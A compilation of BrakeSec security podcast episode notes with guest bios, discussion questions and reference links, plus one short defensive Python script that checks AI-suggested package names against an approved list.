Youtube Video: https://www.youtube.com/watch?v=hcbj94kMCJE
Questions and topics: (please feel free to update or make comments for clarifications)
* Everyone wants us to use AI, but only when it benefits them
* “Don’t use AI to submit your resume to our company”
* “Do know how to use AI”
* “Don’t use AI to answer the interview questions”
* AI implementations range from “super easy” to “crazy easy”
* If you already know how to use AI
* Setting it up wrong can really hurt your company
* Tasks in AI that can get you into trouble
* Contract summarizing
* P&C docs
* Sensitive business proposals
* Using code from an AI that lacks a license
* A Sensible AI policy?
* Should a company already have one, even if they aren’t using AI?
* Maybe like an “AI Code of Conduct”
* “Cool if you use it, but don’t put XX in it”
Additional information / pertinent Links (Would you like to know more?):
Alignment in data science: https://techcommunity.microsoft.com/blog/azuredevcommunityblog/the-true-meaning-of-alignment-decision-modeling-in-data-science/3258269
https://www.amazon.com/Alignment-Problem-Machine-Learning-Values/dp/0393635821
https://blogs.nvidia.com/blog/what-is-retrieval-augmented-generation/
https://ai.meta.com/research/
https://www.youtube.com/watch?v=oVapD2OKCZw
https://github.com/danielmiessler/Fabric - prompts AI in github
https://x.com/thealexbanks/status/1862124708163944859
https://hbr.org/2018/01/podcast-ideacast
https://www.forbes.com/councils/forbestechcouncil/2024/11/15/why-85-of-your-ai-models-may-fail/
https://www.tomshardware.com/tech-industry/artificial-intelligence/research-shows-more-than-80-of-ai-projects-fail-wasting-billions-of-dollars-in-capital-and-resources-report
https://github.com/InfoSecInnovations/concierge
Show points of Contact:
Amanda Berlin: https://www.linkedin.com/in/amandaberlin/
Brian Boettcher: https://www.linkedin.com/in/bboettcher96/
Bryan Brake: https://linkedin.com/in/brakeb
Brakesec Website: https://www.brakeingsecurity.com
Youtube channel: https://youtube.com/@brakeseced
Twitch Channel: https://twitch.tv/brakesec
Youtube Video at: https://www.youtube.com/watch?v=yHPvGVfPgjI
Jay Beale is a principal security consultant and CEO/CTO for InGuardians. He is the architect of multiple open source projects, including the Peirates attack tool for Kubernetes (in Kali Linux), the Bustakube CTF Kubernetes cluster, and Bastille Linux. Jay created and leads the Kubernetes CTF at DEF CON and previously helped in the Kubernetes project's Security efforts. He’s co-written eight books and given many public talks at Black Hat, DEF CON, RSA, CanSecWest, Blue Hat, ToorCon, DerbyCon, WWHF, HushCon and others. He teaches the highly-rated Black Hat class, “Attacking and Protecting Kubernetes, Linux, and Containers.” He has served on the review board of the O’Reilly Security Conference, the board of Mitre’s CVE-related Open Vulnerability and Assessment Language, and been a member of the HoneyNet project. He’s briefed both Congress and the White House.
Questions and topics: (please feel free to update or make comments for clarifications)
* Kubernetes vs. Docker vs. LXC vs. VMs - why did you settle on K8s?
* What’s new with k8s? Version 1.33? Do you always implement the latest version in your CTF, or something that is deliberately vulnerable? (https://www.loft.sh/blog/kubernetes-v-1-33-key-features-updates-and-what-you-need-to-know)
* When you are making a CTF, what’s your methodology? Threat model then verify? Code review? Github pull requests?
* Story time: this isn't the first year you've done this(?); have participants ever surprised you by finding something you didn't expect?
* If I'm running K8s at my workplace, what is the bare minimum k8s security I should implement? Are there security controls that might cost performance, or are 'nice-to-have' but run counter to how orgs actually use k8s, that I should be concerned about implementing?
Additional information / pertinent Links (Would you like to know more?):
https://kubernetes.io/
DEF CON Kubernetes CTF: https://containersecurityctf.com/
Black Hat training: https://www.blackhat.com/us-25/training/schedule/index.html#0-day-unnecessary-attacking-and-protecting-kubernetes-linux-and-containers-45335
https://www.bustakube.com/
https://github.com/inguardians/peirates
Rory McCune’s blog: https://raesene.github.io/
https://www.oreilly.com/library/view/production-kubernetes/9781492092292/ - O’Reilly book: Production Kubernetes
Show points of Contact:
Amanda Berlin: https://www.linkedin.com/in/amandaberlin/
Brian Boettcher: https://www.linkedin.com/in/bboettcher96/
Bryan Brake: https://linkedin.com/in/brakeb
Brakesec Website: https://www.brakeingsecurity.com
Youtube channel: https://youtube.com/@brakeseced
Twitch Channel: https://twitch.tv/brakesec
socvel.com/quiz if you want to play along!
Check out the BrakeSecEd Twitch at https://twitch.tv/brakesec
join the Discord: https://bit.ly/brakesecDiscord
Music:
Music provided by Chillhop Music: https://chillhop.ffm.to/creatorcred
"Flex" by Jeremy Blake
Courtesy of Youtube media library
Guest Info:
Name: Bronwen Aker
Contact Information (N/A): https://br0nw3n.com/
Time Zone(s): Pacific, Central, Eastern
Disclaimer: The views, information, or opinions expressed on this program are solely the views of the individuals involved and by no means represent absolute facts. Opinions expressed by the host and guests can change at any time based on new information and experiences, and do not represent views of past, present, or future employers.
Recorded: https://youtube.com/live/guhM8v8Irmo?feature=share
Show Topic Summary: By harnessing AI, we can assist in being proactive in discovering evolving threats, safeguard sensitive data, analyze data, and create smarter defenses. This week, we’ll be joined by Bronwen Aker, who will share invaluable insights on creating a local AI tailored to your unique needs. Get ready to embrace innovation, transform your work life, and contribute to a safer digital world with the power of artificial intelligence! (heh, I wrote this with the help of AI…)
Questions and topics: (please feel free to update or make comments for clarifications)
Things that concern Bronwen about AI: (https://br0nw3n.com/2023/12/why-i-am-and-am-not-afraid-of-ai/)
Data Amplification: Generative AI models require vast amounts of data for training, leading to increased data collection and storage. This amplifies the risk of unauthorized access or data breaches, further compromising personal information.
Data Inference: LLMs can deduce sensitive information even when not explicitly provided. They may inadvertently disclose private details by generating contextually relevant content, infringing on individuals’ privacy.
Deepfakes and Misinformation: Generative AI can generate convincing deepfake content, such as videos or audio recordings, which can be used maliciously to manipulate public perception or deceive individuals. (Elections, anyone?)
Bias and Discrimination: LLMs may inherit biases present in their training data, perpetuating discrimination and privacy violations when generating content that reflects societal biases.
Surveillance and Profiling: The utilization of LLMs for surveillance purposes, combined with big data analytics, can lead to extensive profiling of individuals, impacting their privacy and civil liberties.
Setting up a local LLM? CPU models vs. GPU models
pros/cons? Benefits?
What can people do if they lack local resources?
Cloud instances? Ec2? Digital Ocean? Use a smaller model?
https://www.theregister.com/2025/04/12/ai_code_suggestions_sabotage_supply_chain/
AI coding assistants are hallucinating package names
5.2 percent of package suggestions from commercial models didn't exist, compared to 21.7 percent from open source or openly available models
Attackers can then create malicious packages matching the invented name; some are quite convincing, with READMEs, fake GitHub repos, even blog posts
An evolution of typosquatting, named "slopsquatting" by Seth Michael Larson of the Python Software Foundation
Threat actor "_Iain" posted instructions and videos using AI for mass-generated fake packages from creation to exploitation
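As an added example for these notes (not code from the article or from any tool mentioned here), a small Python screen for AI-suggested dependencies: each requirement is normalised and checked against a constructed approved-package index standing in for a lockfile or registry snapshot, and unknown names are reported with the closest approved name so a reviewer can tell a one-letter near-miss from a wholesale invention before anything is installed.

```python
"""
Slopsquatting guard: screen AI-suggested dependencies against a known index
before running an install.  Added example; the index and the suggested
requirements file below are constructed for the demo.  In practice the
index would be your approved-package list or lockfile, not this short set.
"""
import re
from difflib import SequenceMatcher

# Constructed stand-in for an approved-package index / lockfile.
KNOWN_PACKAGES = {
    "requests", "urllib3", "cryptography", "pyyaml", "boto3", "numpy",
    "pydantic", "httpx", "python-dateutil", "jinja2",
}

# PEP 503 name normalisation: case-fold, collapse runs of '-', '_', '.' to '-'.
def normalize(name: str) -> str:
    return re.sub(r"[-_.]+", "-", name).lower()

# Bare project name at the start of a requirement line; extras, version
# specifiers and environment markers that follow are ignored.
_REQ_RE = re.compile(r"^\s*([A-Za-z0-9][A-Za-z0-9._-]*)")

def parse_requirement(line: str):
    """Return the project name from a requirements line, or None for
    blank lines, comments and pip options such as '-r' or '--index-url'."""
    stripped = line.strip()
    if not stripped or stripped.startswith(("#", "-")):
        return None
    m = _REQ_RE.match(stripped)
    return m.group(1) if m else None

def closest_known(name: str, known=KNOWN_PACKAGES):
    """Nearest approved name by similarity ratio (0..1); a high score on an
    unknown name is the typosquat / look-alike pattern, a low score is a
    name the assistant simply made up."""
    norm = normalize(name)
    best, best_score = None, 0.0
    for k in known:
        score = SequenceMatcher(None, norm, normalize(k)).ratio()
        if score > best_score:
            best, best_score = k, score
    return best, round(best_score, 2)

def screen_requirements(text: str, known=KNOWN_PACKAGES):
    """Classify each requirement as 'known' or 'unknown'.  Unknown entries
    carry the closest approved name and its similarity for the reviewer."""
    normalized_known = {normalize(k) for k in known}
    report = []
    for line in text.splitlines():
        name = parse_requirement(line)
        if name is None:
            continue
        if normalize(name) in normalized_known:
            report.append({"name": name, "status": "known"})
        else:
            near, score = closest_known(name, known)
            report.append({"name": name, "status": "unknown",
                           "closest": near, "similarity": score})
    return report

def unknown_names(text: str, known=KNOWN_PACKAGES):
    """Just the names that must be verified by a human before install."""
    return [r["name"] for r in screen_requirements(text, known)
            if r["status"] == "unknown"]

# Constructed "assistant-generated" requirements file for the demo.
SUGGESTED = """\
# deps suggested by an assistant (constructed sample)
requests>=2.31
PyYAML==6.0.1
python_dateutil
cryptograpy>=41      # one letter off from a real package
aws-s3-helper-utils  # plausible-sounding name that is not in the index
httpx[http2]
"""

if __name__ == "__main__":
    for entry in screen_requirements(SUGGESTED):
        print(entry)
```

Run against a real requirements file, swap KNOWN_PACKAGES for the names in your lockfile; anything reported as unknown gets looked up by hand, not installed on the assistant's say-so.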
Additional information / pertinent Links (Would you like to know more?):
https://www.reddit.com/r/machinelearningnews/s/HDHlwHtK7U
https://br0nw3n.com/2024/06/llms-and-prompt-engineering/ - Prompt Engineering talk
https://br0nw3n.com/wp-content/uploads/LLM-Prompt-Engineering-LayerOne-May-2024.pdf (slides)
Daniel Meissler ‘Fabric’ - https://github.com/danielmiessler/fabric
Ollama tutorial (co-founder of ollama - Matt Williams): https://www.youtube.com/@technovangelist
https://www.whiterabbitneo.com/ - AI for DevSecOps, Security
https://blogs.nvidia.com/blog/what-is-retrieval-augmented-generation/
https://www.youtube.com/watch?v=OuF3Q7jNAEc - neverending story using an LLM
Show points of Contact:
Amanda Berlin: https://www.linkedin.com/in/amandaberlin/
Brian Boettcher: https://www.linkedin.com/in/bboettcher96/
Bryan Brake: https://linkedin.com/in/brakeb
Brakesec Website: https://www.brakeingsecurity.com
Youtube channel: https://youtube.com/@brakeseced
Twitch Channel: https://twitch.tv/brakesec
Published on: April 22, 2025
Youtube VOD: https://www.youtube.com/watch?v=zu_smyQGvG4
https://cyberintel.substack.com/p/doge-exposes-once-secret-government
https://x.com/SteamDB/status/1889610974484705314 – supply chain issues can crop up anywhere… are you blocking people from steam and popular software downloads online?
https://www.landh.tech/blog/20250211-hack-supply-chain-for-50k/
https://medium.com/@cyberengage.org/rethinking-incident-response-from-picerl-to-dair-7b153a76e044
https://www.youtube.com/watch?v=3HRkKznJoZA <- 100 digits of pi
https://www.youtube.com/watch?v=rz4Dd1I_fX0 <- periodic table song
Additional information / pertinent Links (Would you like to know more?):
https://www.socvel.com/quiz/
https://xphantom.nl/posts/Offensive-Security-Lab/
Show points of Contact:
Amanda Berlin: https://www.linkedin.com/in/amandaberlin/
Brian Boettcher: https://www.linkedin.com/in/bboettcher96/
Bryan Brake: https://linkedin.com/in/brakeb
Brakesec Website: https://www.brakeingsecurity.com
Youtube channel: https://youtube.com/@brakeseced
discord: https://discord.gg/brakesec
Twitch Channel: https://twitch.tv/brakesec
Music: https://chillhop.ffm.to/creatorcred "Flex" by Jeremy Blake
Courtesy of Youtube media library
Published on: February 17, 2025
Check out the BrakeSecEd Twitch at https://twitch.tv/brakesec
Join the Discord! https://discord.gg/brakesec
#youtube VOD (in 1440p): https://www.youtube.com/watch?v=axQWGyd79NM
Questions and topics:
Bsides Vancouver discussion
Semgrep Community and Academy
Building communities
What are ‘secure guardrails’
Reducing barriers between security and developers
How to sell security to devs: “hey, if you want to see us less, buy/use this?”
“Security is your barrier, but we have goals that we can’t reach without your help.”
https://wehackpurple.com/devsecops-worst-practices-artificial-gates/
How are you seeing things like AI being used to help with DevOps or is it just making things more complicated? Not just helping write code, but infrastructure Ops, software inventories, code repo hygiene, etc?
OWASP PNW https://www.appsecpnw.org/
Alice and Bob coming next year!
Additional information / pertinent Links (Would you like to know more?):
shehackpurple.ca
Semgrep (https://semgrep.dev/)
https://aliceandboblearn.com/
https://academy.semgrep.dev/ (free training)
Netflix ‘paved roads’: https://netflixtechblog.com/how-we-build-code-at-netflix-c5d9bd727f15
https://en.wikipedia.org/wiki/Nudge_theory
https://www.perforce.com/blog/qac/what-is-linting
https://www.youtube.com/watch?v=FSPTiw8gSEU
https://techhq.com/2024/02/air-canada-refund-for-customer-who-used-chatbot/
Show points of Contact:
Amanda Berlin: @infosystir @hackershealth
Brian Boettcher: @boettcherpwned
Bryan Brake: https://linkedin.com/in/brakeb
Brakesec Website: https://www.brakeingsecurity.com
Youtube channel: https://youtube.com/@BrakeSecEd
Twitch Channel: https://twitch.tv/brakesec
Published on: June 1, 2024
Youtube VOD: https://youtu.be/G3PxZFmDyj4
#appsec, #owasp, #ASVS, #joshGrossman, #informationsecurity, #SBOM, #supplychain, #podcast, #twitch, #brakesec, #securecoding, #Codeanalysis
Questions and topics:
1. The background to the topic, why is it something that interests you?
How do you convince developers to take your course?
2. What do you think the root cause of the gap is?
3. Who is causing the gaps? (‘go fast’ culture, overzealous security, GRC requirements, basically everyone?)
4. Where do gaps begin? Is it the ‘need’ to ‘move fast’?
5. What can devs do to involve security in their process? Sprint planning? SCA tools?
6. How have you seen this go wrong at organizations?
7. How important is it to have security early in the product development process?
8. What sort of challenges do you think mainstream security people face in AppSec scenarios?
9. How does Product Security differ from Application Security? (what if the product is an application?)
10. What are the key development concepts that security people need to be familiar with to effectively get involved in AppSec/ProdSec?
11. How do you suggest a security team approach AppSec/ProdSec?
Leadership buy-in
Effective/valuable processes
Tools should achieve a goal
12. SBOM - NTIA is asking for it, How to get dev teams to care.
13. Key takeaways?
Additional information / pertinent Links (Would you like to know more?):
BlackHat Training: https://www.blackhat.com/us-24/training/schedule/index.html#accelerated-appsec--hacking-your-product-security-programme-for-velocity-and-value-virtual-37218
https://www.walkme.com/blog/leadership-buy-in/
https://www.bouncesecurity.com/
https://www.teamgantt.com/blog/raci-chart-definition-tips-and-example
https://www.cisa.gov/sbom
SCA Tools https://chpk.medium.com/top-10-software-composition-analysis-sca-tools-for-devsecops-85bd3b7512dd
https://semgrep.dev/
https://www.linkedin.com/in/joshcgrossman
https://owasp.org/www-project-application-security-verification-standard/
https://github.com/OWASP/ASVS/tree/master/5.0
https://owasp.org/www-project-cyclonedx/
https://joshcgrossman.com/
PyCon talk about custom security testing: https://www.youtube.com/watch?v=KuNZzDjvMlg
Michal's Black Hat course - Accurate and Scalable: Web Application Bug Hunting: https://www.blackhat.com/us-24/training/schedule/index.html#accurate-and-scalable-web-application-bug-hunting-37210
https://www.blackhat.com/us-24/training/schedule/index.html#accurate-and-scalable-web-application-bug-hunting-372101705524544
ASVS website: https://owasp.org/asvs
Lightning talk I did recently about OWASP: https://www.bouncesecurity.com/eventspast#f86548cb37cb2a82728b1762bd1b7aee
Show points of Contact:
Amanda Berlin: @infosystir @hackershealth
Brian Boettcher: @boettcherpwned
Bryan Brake: https://linkedin.com/in/brakeb
Brakesec Website: https://www.brakeingsecurity.com
Youtube channel: https://youtube.com/@brakeseced
Twitch Channel: https://twitch.tv/brakesec
Disclaimer: The views, information, or opinions expressed on this program are solely the views of the individuals involved and by no means represent absolute facts. Opinions expressed by the host and guests can change at any time based on new information and experiences and do not represent views of past, present, or future employers.
Recorded: 08 Apr 2024
Youtube VOD: https://www.youtube.com/watch?v=K8qApvsFtqw
Show Topic Summary:
If you want to get in the mind of a board member, I submit to you my discussion with Mary Gardner we did last night on #brakesec #education. Join Mary and me as we discuss the functions of a board, messaging to various levels of leadership and teams, and what it takes to make that leap to being a CISO.
And when you're done, and you need someone to help your org get more mature, contact the team at GoldiKnox.
#cybersecurity #informationsecurity #ciso #leadership #GRC
Questions and topics:
https://hbr.org/2023/05/boards-are-having-the-wrong-conversations-about-cybersecurity
“Just 69% of responding board members see eye-to-eye with their chief information security officers (CISOs). Fewer than half (47%) of members serve on boards that interact with their CISOs regularly, and almost a third of them only see their CISOs at board presentations. “
They obviously have different priorities, so what brings everyone to the table to discuss? Are they even worried about security?
Tactical goals vs. org goals and aligning them
What are boards most worried about these days?
Staying relevant in the face of AI?
What tech will protect them from the newest threats?
GRC is forced security: on its own, security is completely optional, but compliance requires some sort of security
Additional information / pertinent Links (Would you like to know more?):
Research organizations (gartner, forrester, etc)
https://hbr.org/2022/11/is-your-board-prepared-for-new-cybersecurity-regulations
Show points of Contact:
Amanda Berlin: @infosystir @hackershealth
Brian Boettcher: @boettcherpwned
Bryan Brake: https://linkedin.com/in/brakeb
Brakesec Website: https://www.brakeingsecurity.com
Youtube channel: https://youtube.com/@brakeseced
Twitch Channel: https://twitch.tv/brakesec
Discord: https://discord.gg/brakesec
Published on: April 9, 2024
Full Youtube VOD: https://www.youtube.com/watch?v=uX7odQTBkyQ
Questions and topics:
Let’s talk about Mindful Business Podcast
What’s the topics you cover?
Topic #1: discuss your experiences when you were a new leader.
What worked? What didn't? What would you have done differently?
Do you emulate your manager's style? What have been your go-to management resources?
What is a good piece of advice that you’ve been given or that you impart to others that relates to leadership?
Topic #2: building/operating SaaS products (we can discuss securing them, and what functions should be table stakes (data structures, logging, etc.))
Topic #3: What are the bare minimums for building 'secure' SaaS products in your particular field? And how do you balance security with a positive user experience (i.e. getting customers to buy into MFA/OAuth, OTA updates)?
Topic #4: Do many SaaS products get over-integrated? Does the need for integration override best practices in security?
Additional information / pertinent Links (Would you like to know more?):
Twitter/Mastodon:
https://twitter.com/AccidentalCISO
https://infosec.exchange/@accidentalciso
The Mindful Business Security Show:
https://www.mindfulsmbshow.com/
https://twitter.com/mindfulsmbshow
Show points of Contact:
Amanda Berlin: @infosystir @hackershealth
Brian Boettcher: @boettcherpwned
Bryan Brake: https://linkedin.com/in/brakeb
Brakesec Website: https://www.brakeingsecurity.com
Youtube channel: https://youtube.com/@brakeseced
Twitch Channel: https://twitch.tv/brakesec
Published on: February 13, 2024
Disclaimer: The views, information, or opinions expressed on this program are solely the views of the individuals involved and by no means represent absolute facts. Opinions expressed by the host and guests can change at any time based on new information, and do not represent views of past, present, or future employers.
Recorded: 28 Jan 2024
Youtube VOD: https://youtube.com/live/uX7odQTBkyQ
Published on: February 2, 2024
It's our 10th anniversary and the first show of our 2024 season!
Amanda was on "7 minute security"
https://7minsec.com/projects/podcast
Check out the complete VOD at https://youtu.be/vbmEtkxhAMg
Explicit language warning
Published on: January 9, 2024
Youtube Video: https://youtu.be/IUDPlQaQg8M
https://forms.gle/rf145MoN7cskwMjf8 is the link to the survey. Your information (should you choose to identify yourself) will not be shared outside of the BrakeSec Team.
Thank all of you for listening and for your input.
RSS feed for the audio podcast is at https://www.brakeingsecurity.com/rss
website: https://www.brakeingsecurity.com
Show Topic Summary:
Ms. Berlin proposes a question of how to gather more headcount with metrics, we discuss the BLUFFS bluetooth vulnerability, and “Ranty Claus” talks about CISA’s remarks of putting the onus on device product makers to remove choice for customers and implement secure defaults.
#youtube VOD: https://www.youtube.com/watch?v=emcAzTx9z0c
Questions and topics:
Additional information / pertinent Links (Would you like to know more?):
https://www.cisa.gov/resources-tools/resources/stop-passing-buck-cybersecurity
Examples of companies forcing changes https://www.bleepingcomputer.com/news/microsoft/microsoft-will-roll-out-mfa-enforcing-policies-for-admin-portal-access/
https://github.com/aya-rs/aya - eBPF implementation in Rust
https://www.darkreading.com/endpoint-security/critical-logofail-bugs-secure-boot-bypass-millions-pcs
Show points of Contact:
Amanda Berlin: @infosystir @hackershealth
Brian Boettcher: @boettcherpwned
Bryan Brake: @bryanbrake on Mastodon.social, https://linkedin.com/in/brakeb
Brakesec Website: https://www.brakeingsecurity.com
Twitter: @brakesec
Youtube channel: https://youtube.com/c/BDSPodcast
Twitch Channel: https://twitch.tv/brakesec
Published on: December 4, 2023
Subscribe on Twitch using Amazon Prime and watch us live: https://twitch.tv/brakesec
Check out our VODs on Youtube: https://www.youtube.com/@BrakeSecEd
Join the BrakeSecEd discord: https://discord.gg/brakesec
News:
https://www.darkreading.com/remote-workforce/1password-latest-victim-okta-customer-service-breach
https://www.documentcloud.org/documents/24075435-bhi-notice
https://www.shacknews.com/article/137505/ransomware-group-capcom-2020-arrested
https://www.nasdaq.com/articles/three-cybersecurity-sectors-that-resist-economic-downturns
Published on: October 26, 2023
Disclaimer: The views, information, or opinions expressed on this program are solely the views of the individuals involved and by no means represent absolute facts. Opinions expressed by the host and guests can change at any time, and do not represent views of past, present, or future employers.
Guest Bio: Nicole is the Chief Product Officer at Axio. Nicole has spent her career building awareness around the benefits of usable security and human-centered security as a way to increase company revenue and create a seamless user experience.
Youtube VOD Link: https://youtube.com/live/tFaAB9an47g
Questions and topics: Usable security: is it an oxymoron?
What determines if security is 'usable' or not? We sacrifice security for a better UX; what can be done to alleviate that? Or is it some sort of sliding scale between "poor UX, amazing security" and "awesome UX, poor security"?
Examples of poor UX for 'people': MFA and password managers.
SEC updates and ‘material events’ and how that would affect security, IR, and other company reporting functions.
Also, additional documentation (Regulation S-K Item 106) https://www.linkedin.com/posts/nicole-sundin-5225a1149_sec-adopts-rules-on-cybersecurity-risk-management-activity-7090065804083290112-ISD8
Are companies ready to talk about their cybersecurity? Can the SEC say “you’re not doing enough?”
What is ‘enough’?
Are we heading toward yet another audit needed for public companies, similar to SOX?
When does an 8-K get publicly disclosed?
Materiality is based on a “reasonable investor”?
So, you don't need to announce that until you're certain, and it's based on what you can collect?
Cyber Risk Management and some good examples of how to set up a proper cyber risk organization
Additional Links:
http://web.mit.edu/Saltzer/www/publications/protection/Basic.html
https://www.sec.gov/news/press-release/2023-139
https://www.sec.gov/news/statement/munter-statement-assessing-materiality-030922
https://www.nasa.gov/centers/ames/research/technology-onepagers/hc-computing.html
https://securityscorecard.com/blog/what-is-cyber-security-performance-management/
Published on: September 23, 2023
Disclaimer: The views, information, or opinions expressed on this program are solely the views of the individuals involved and by no means represent absolute facts. Opinions expressed by the host and guests can change at any time, and do not represent views of past, present, or future employers.
Guest Bio: John is the CEO of Aronetics. An avid climber and runner, John has spoken at many conferences about topics like ZeroTrust, BIOS/UEFI security, communication security, and malware. Aronetics is a technology-enabled service provider.
Youtube VOD: https://youtube.com/live/5dIVTwVZLAU
Linkedin VOD: https://www.linkedin.com/video/live/urn:li:ugcPost:7101738254823030784
Show Topic Summary:
John joins us to discuss "Letters of Marque" in an effort for hackers to 'hack back'... the over-reliance on automation, and communication silos. We also talk about what a 'junior position' in infosec looks like with AI doing all the "Level 1 SOC Analyst" type roles normally given to someone fresh to the security industry.
Questions and topics:
Is infosec over-reliant on automation? Automation comes with its own challenges.
Documentation woes
Automation is usually found in userland
Aronetics’ Thor provides defense and counter-offense tamper-proof technology digitally tied to
Letter of Marque - good idea, or geopolitical disaster waiting to happen?
Silos and communication: best ways to overcome those, inside an org and outside?
How do we overcome siloing?
Overcoming security challenges?
Identity management: 2FA is everywhere, and there are already ways around 2FA, so what now? 3FA? Biometrics? Make everyone carry around physical tokens that we can lose?
Blog post: https://www.aronetics.com/post-quantum-cryptography/
What do we need to protect against? Nation states with quantum computers? Rubber hose cryptography?
Crime thrives in areas of low visibility. https://www.aronetics.com/unknown/
https://www.aronetics.com/inside-the-breach/ (threat detection - the crime thrives in low vis areas)
Show points of Contact:
Brakesec Website: https://www.brakeingsecurity.com
Youtube channel: https://youtube.com/c/BDSPodcast
Twitch Channel: https://twitch.tv/brakesec
Amanda Berlin: @[email protected] (Mastodon) @hackershealth
Brian Boettcher: @boettcherpwned
Bryan Brake: @bryanbrake on Mastodon.social
Published on: September 3, 2023
Disclaimer: The views, information, or opinions expressed on this program are solely the views of the individuals involved and by no means represent absolute facts. Opinions expressed by the host and guests can change at any time, and do not represent views of past, present, or future employers.
Buy here: https://subscription.packtpub.com/book/security/9781801076715
Amazon Link: https://packt.link/megan
Youtube VOD: https://www.youtube.com/watch?v=p1_jQa9OQ2w
Show Topic Summary:
Megan Roddie is currently working as a Senior Security Engineer at IBM. Along with her work at IBM, she works with the SANS Institute as a co-author of FOR509, presents regularly at security conferences, and serves as CFO of Mental Health Hackers. Megan has two Master's degrees, one in Digital Forensics and the other in Information Security Engineering, along with many industry certifications in a wide range of specialties. When Megan is not fighting cybercrime, she is an active competitor in Muay Thai/Kickboxing. She is a co-author of “Practical Threat Detection Engineering” from Packt publishing, on sale now in print and e-book. Buy here: https://subscription.packtpub.com/book/security/9781801076715
https://packt.link/megan ← Amazon redirect link that publisher uses if you want something easier on the notes
Questions and topics:
Of the 3 models, which do you find you use more and why? (PoP, ATT&CK, kill chain)
What kind of orgs have ‘detection engineering’ teams? What roles are involved here, and can other teams (like IR) be involved or share a reverse role there?
Lab setup requires an agent… any agent for ingestion or something specific?
How does Fleet or data ingestion work for IoT/embedded device testing? Anything you suggest?
How important is it to normalize your log output for ingestion? (app, web, server all tell the story)
Additional information / pertinent Links (Would you like to know more?):
Unified Kill Chain: https://www.unifiedkillchain.com/
ATT&CK: https://attack.mitre.org/
D3FEND matrix BrakeSec show from 2021: https://brakeingsecurity.com/2021-023-d3fend-framework-dll-injection-types-more-solarwinds-infections
Pyramid of Pain: https://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html
https://www.securitymagazine.com/articles/98486-435-million-the-average-cost-of-a-data-breach
https://medium.com/@gary.j.katz (per Megan, ‘it’s basically Chapter 11 of the book’)
Show points of Contact:
Amanda Berlin: @infosystir @hackershealth
Brian Boettcher: @boettcherpwned
Bryan Brake: @bryanbrake on Mastodon.social, Twitter, bluesky
Brakesec Website: https://www.brakeingsecurity.com
Twitter: @brakesec
Youtube channel: https://youtube.com/c/BDSPodcast
Twitch Channel: https://twitch.tv/brakesec
Published on: August 25, 2023
Check out our sponsor (BLUMIRA) at https://blumira.com/brake
youtube channel link: https://youtube.com/c/BDSPodcast
Full video on our youtube Channel! https://www.youtube.com/watch?v=BkBeLuM_urk
https://www.rapid7.com/blog/post/2023/07/11/cve-2023-29298-adobe-coldfusion-access-control-bypass/
https://www.darkreading.com/remote-workforce/hacker-infected-foiled-by-own-infostealer
https://therecord.media/cisa-warnings-adobe-microsoft-citrix-vulnerabilities
https://therecord.media/airline-customer-support-phone-number-fraud-google
https://twitter.com/Shmuli/status/1680669938468499458
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36884
https://www.jdsupra.com/legalnews/tabletop-exercises-as-risk-mitigation-5278057/
https://bevyengine.org/ - Rust game engine
https://godotengine.org/ - a more mature Rust game engine
https://flappybird.io/ - which I suck at, BTW
Intro/outro music:
"Flex" by Jeremy Blake
Courtesy of YouTube Music Library (used with proper permissions)
Published on: July 21, 2023
BrakeSec Show Outline – No Guest
Youtube VOD: https://youtube.com/live/UGRaRSYj7kc
Published on: May 27, 2023
Youtube VOD: https://www.youtube.com/watch?v=afZHiBUr-2g
Published on: March 4, 2023
BrakeSec Show Outline (all links valid as of 27 Jan 2023, subject to change)
Published on: February 10, 2023
Lots of layoffs (Meta, Microsoft, Amazon, Sophos, Alphabet, Google): we talk about the future effects of that and whether it affected security. Attack surface management is risk management, breaches and the TSA no-fly list leaked, and more!
Full youtube video: https://www.youtube.com/watch?v=1Dgq8FpnWPw
Questions and/or potential sub-topics (5 minimum):
Layoffs (fear, uncertainty, doubt), what it means for people
https://www.lollydaskal.com/leadership/5-warning-signs-you-are-being-led-by-a-weak-leader/
"No fly list leaked" https://www.vice.com/en/article/93a4p5/us-no-fly-list-leaks-after-being-left-in-an-unsecured-airline-server
Attack Surface Management: https://flashpoint.io/blog/what-is-attack-surface-management/
https://securityaffairs.com/141102/hacking/eof-cisco-routers-exposed-rce.html
https://www.linkedin.com/posts/threatintelligence_threat-intel-cheat-sheet-by-cyber-threat-activity-7021035081184026624-3GWH? (issues with "step 0")
Additional information / pertinent Links (would you like to know more?):
https://www.sec.gov/ix?doc=/Archives/edgar/data/0001283699/000119312523010949/d641142d8k.htm - TMO's 8-K filing
Show Points of Contact:
Amanda Berlin: @infosystir @hackershealth
Brian Boettcher: @boettcherpwned
Bryan Brake: @bryanbrake @[email protected]
Website: https://www.brakeingsecurity.com Twitch: https://twitch.tv/brakesec
Full stream video on Youtube: https://youtu.be/i1xpAfNFCvY
John's Youtube channel, to find more training/contact information: https://www.youtube.com/channel/UC3ctyx980M8jLa_cEiQveLQ
https://en.wikipedia.org/wiki/Capability_Maturity_Model_Integration
ADKAR model: https://www.prosci.com/methodology/adkar
CCE framework: https://inl.gov/cce/
Dashboard (non-sponsored link): https://monday.com
Diagramming tool: https://figma.com
https://www.sciencedirect.com/topics/computer-science/system-analysis
Amazon book: https://www.amazon.com/Engineering-Safer-World-Systems-Thinking/dp/0262533693
Published on: December 20, 2022
Published on: December 11, 2022
https://youtu.be/iW39Mugj4OM -Full stream video (interview starts at 28m22s)
Broadcast live on Twitch -- Watch live at https://www.twitch.tv/brakesec
Seattle Community Network - https://seattlecommunitynetwork.org/
https://medium.com/seattle-community-network/
Check Bryan out on Mastodon!
Published on: November 22, 2022
Introducing @operat0r, who talked a bit about mobile device hacking and rooting/jailbreaking phones for testing
Grab the powershell script here: https://github.com/freeload101/Java-Android-Magisk-Burp-Objection-Root-Emulator-Easy
Check out the Youtube videos, including demo! Part2 is here: https://www.youtube.com/watch?v=RXgwUWpRuYA
Published on: November 7, 2022
Introducing @operat0r, who talked a bit about mobile device hacking and rooting/jailbreaking phones for testing
Grab the powershell script here: https://github.com/freeload101/Java-Android-Magisk-Burp-Objection-Root-Emulator-Easy
Check out the Youtube videos, including demo! Part 2 will be available soon!
Part 1: https://youtu.be/U5SFav9h1L4
https://www.bnbchain.org/en/blog/bnb-chain-ecosystem-update/
https://medium.com/@johnblatt23/uber-hack-reveals-weakness-in-the-human-firewall-8b44a87d43b4
https://securityintelligence.com/articles/what-to-know-honda-key-fob-vulnerability/
https://www.theregister.com/2022/10/07/binance_hack_566m/
